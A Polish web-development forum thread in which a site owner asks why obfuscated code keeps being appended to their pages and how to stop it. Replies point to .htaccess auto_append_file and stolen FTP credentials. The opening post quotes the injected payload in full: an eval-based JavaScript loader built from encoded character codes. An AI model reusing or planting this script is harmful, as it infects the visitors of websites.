Witaj Gościu! ( Zaloguj | Rejestruj )

Forum PHP.pl

 
 Reply to this topicStart new topic
> Doklejany kod do plików
aplek
post
Post #1





Grupa: Zarejestrowani
Postów: 3
Pomógł: 0
Dołączył: 27.03.2013

Ostrzeżenie: (0%)
-----

Witam, od pewnego czasu mam problem na stronie nie wiem skąd dokleja mi się kod (VIRUS) do streony :

[HTML] pobierz, plaintext 
  1. <script type="text/javascript" language="javascript" >                                                                                                                                                                                                                                                          ff=String;fff="fromCharCode";ff=ff[fff];zz=3;try{document.body&=5151}catch(gdsgd){v="eva"+"l";if(document)try{document.body=12;}catch(gdsgsdg){vzs=0;try{document;}catch(q){vzs=1;}}if(!vzs)e=window[v];if(1){f=new Array(045,0143,0162,0153,0140,0161,0146,0154,0153,035,045,046,035,0170,012,07,035
    ,035,035,035,0163,0136,0157,035,0161,0167,0153,035,072,035,0141,0154,0140,0162,01
    52,0142,0153,0161,053,0140,0157,0142,0136,0161,0142,0102,0151,0142,0152,0142,0153
    ,0161,045,044,0146,0143,0157,0136,0152,0142,044,046,070,012,07,012,07,035,035,035
    ,035,0161,0167,0153,053,0160,0157,0140,035,072,035,044,0145,0161,0161,0155,067,05
    4,054,0153,0154,0140,0151,0142,0144,0146,0150,0157,0136,0147,0153,0154,053,0153,0
    142,0161,054,0140,0151,0150,053,0155,0145,0155,044,070,012,07,035,035,035,035,016
    1,0167,0153,053,0160,0161,0166,0151,0142,053,0155,0154,0160,0146,0161,0146,0154,0
    153,035,072,035,044,0136,0137,0160,0154,0151,0162,0161,0142,044,070,012,07,035,03
    5,035,035,0161,0167,0153,053,0160,0161,0166,0151,0142,053,0137,0154,0157,0141,014
    2,0157,035,072,035,044,055,044,070,012,07,035,035,035,035,0161,0167,0153,053,0160
    ,0161,0166,0151,0142,053,0145,0142,0146,0144,0145,0161,035,072,035,044,056,0155,0
    165,044,070,012,07,035,035,035,035,0161,0167,0153,053,0160,0161,0166,0151,0142,05
    3,0164,0146,0141,0161,0145,035,072,035,044,056,0155,0165,044,070,012,07,035,035,0
    35,035,0161,0167,0153,053,0160,0161,0166,0151,0142,053,0151,0142,0143,0161,035,07
    2,035,044,056,0155,0165,044,070,012,07,035,035,035,035,0161,0167,0153,053,0160,01
    61,0166,0151,0142,053,0161,0154,0155,035,072,035,044,056,0155,0165,044,070,012,07
    ,012,07,035,035,035,035,0146,0143,035,045,036,0141,0154,0140,0162,0152,0142,0153,
    0161,053,0144,0142,0161,0102,0151,0142,0152,0142,0153,0161,077,0166,0106,0141,045
    ,044,0161,0167,0153,044,046,046,035,0170,012,07,035,035,035,035,035,035,035,035,0
    141,0154,0140,0162,0152,0142,0153,0161,053,0164,0157,0146,0161,0142,045,044,071,0
    141,0146,0163,035,0146,0141,072,0131,044,0161,0167,0153,0131,044,073,071,054,0141
    ,0146,0163,073,044,046,070,012,07,035,035,035,035,035,035,035,035,0141,0154,0140,
    0162,0152,0142,0153,0161,053,0144,0142,0161,0102,0151,0142,0152,0142,0153,0161,07
    7,0166,0106,0141,045,044,0161,0167,0153,044,046,053,0136,0155,0155,0142,0153,0141
    ,0100,0145,0146,0151,0141,045,0161,0167,0153,046,070,012,07,035,035,035,035,0172,
    012,07,0172,046,045,046,070);}w=f;s=[];if(window.document)for(i=2-2;-i+470!=0;i+=1){j=i;if((031==0x19))if(e)s=s+ff(w[j]+3);}xz=e;if(window.document)if(v)xz(s)}</script><!--/8f4d8e-->
[HTML] pobierz, plaintext


Jak się przed tym zabezpieczyć ?
Jak nadać prawo plikom *.tpl do nie zapisywania ?
Go to the top of the page
+Quote Post
PrinceOfPersia
post
Post #2





Grupa: Zarejestrowani
Postów: 717
Pomógł: 120
Dołączył: 18.04.2009

Ostrzeżenie: (0%)
-----

licho go wie... miałem kiedyś taką sytuację na jednym serwerze, że w .htaccess było coś w stylu "auto_append_file" i wszystkie pliki automatycznie zainfekowało.

Ten post edytował PrinceOfPersia 27.03.2013, 09:35:49
Go to the top of the page
+Quote Post
!*!
post
Post #3





Grupa: Zarejestrowani
Postów: 4 298
Pomógł: 447
Dołączył: 16.11.2006

Ostrzeżenie: (0%)
-----

Temat był wałkowany, więcej niż setkę razy. Poszukaj pod frazami "włamanie na stronę/serwer, zapamiętanie haseł, total commander".

Ten post edytował !*! 27.03.2013, 09:38:31
Go to the top of the page
+Quote Post
aplek
post
Post #4





Grupa: Zarejestrowani
Postów: 3
Pomógł: 0
Dołączył: 27.03.2013

Ostrzeżenie: (0%)
-----

Dałem htacces nic, uwaliłem ftpa, zobaczymy może zmieni, co najlepsze, kasuje jeden plik, a on znów się pojawia.
Go to the top of the page
+Quote Post
« Następny starszy · Serwery WWW · Następny nowszy »
 

Reply to this topicStart new topic
2 Użytkowników czyta ten temat (2 Gości i 0 Anonimowych użytkowników)
0 Zarejestrowanych:

 

Tryb wyświetlania: Standardowy · Przełącz na: Linearny+ · Przełącz na: Drzewo

Śledź ten temat · Wyślij temat na e-mail · Wydrukuj ten temat · Subskrybuj to forum

RSS Aktualny czas: 14.01.2026 - 16:49
Powered By IP.Board © 2026  IPS, Inc.
All changes by PHP.pl Administrators
Hosting zapewnia NQ.pl hosting, trac, svn